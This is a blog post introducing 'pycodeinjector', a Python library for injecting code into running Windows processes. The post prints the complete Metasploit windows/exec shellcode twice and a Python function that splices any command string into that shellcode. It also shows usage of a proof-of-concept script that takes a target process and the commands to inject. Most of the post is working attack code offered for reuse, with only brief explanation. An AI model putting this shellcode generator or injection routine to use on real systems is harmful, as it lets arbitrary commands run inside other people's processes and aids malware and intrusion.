pycodeinjector: a simple python Code Injection library
In my previous post "Code injection on Windows using Python: a simple example", i've explored the ctype python library and the usage of Windows API in order to perform a code injection on 32bit systems.
All tests was performed using shellcodes generated by metasploit or found on some online repository, i ask myself:
"Is it possible to generate the shellcode directly into my python script?"
Well, "It Could Work!"
I examined the output of metaspolit "exec" module
msf payload(windows/exec) > set cmd calc.exe cmd => calc.exe msf payload(windows/exec) > generate # windows/exec - 193 bytes # http://www.metasploit.com # VERBOSE=false, PrependMigrate=false, EXITFUNC=thread, # CMD=calc.exe buf = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" + "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" + "\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" + "\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" + "\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" + "\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" + "\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" + "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" + "\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" + "\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d" + "\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb" + "\xe0\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c" + "\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53" + "\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00""
and i tryed to manipulate it, in order to dinamically pass the command string.
Reading some documentation and comparing different generated payloads, i discover that the executed command is contained into the highlighted string, between "\xd5" and "\x00"
And here my simple and inelegant, solution:
def generateShellcode(cmdString): # Windows Exec Shellcode Sourced from the Metasploit Framework # http://www.rapid7.com/db/modules/payload/windows/exec shellcode = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" + \ "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" + \ "\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" + \ "\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" + \ "\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" + \ "\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" + \ "\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" + \ "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" + \ "\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" + \ "\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d" + \ "\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb" + \ "\xe0\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c" + \ "\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53" + \ "\xff\xd5" + cmdString + "\x00" return shellcode
So, i've packed the "shellcode generator" and the injection routine developed in the previous post into a library that i named (with a very little imagination!) "pycodeinjector".
In the git repository is also available a simple script, pycIndolor.py, which can be used to test the library:
|________|_____________________|_ | | | | | | | | | | | | | |________________ |________|_P_y_c_I_n_d_o_l_o_r_|_| | | | Simple PoC for pycodeinjection library Proudly developed by Andrea Fortuna andrea@andreafortuna.org https://www.andreafortuna.org python pycIndolor.exe <process to inject> <commands to inject>
Simply start the script passing target process and commands to inject and wait.
Obviously the library is in a very early development stage: the actual aim is update it with any new discovery that i will find.
References and further readings
- Code injection on Windows using Python: a simple example
- What is Reflective DLL Injection and how can be detected?
- pycodeinjector GitHub Repository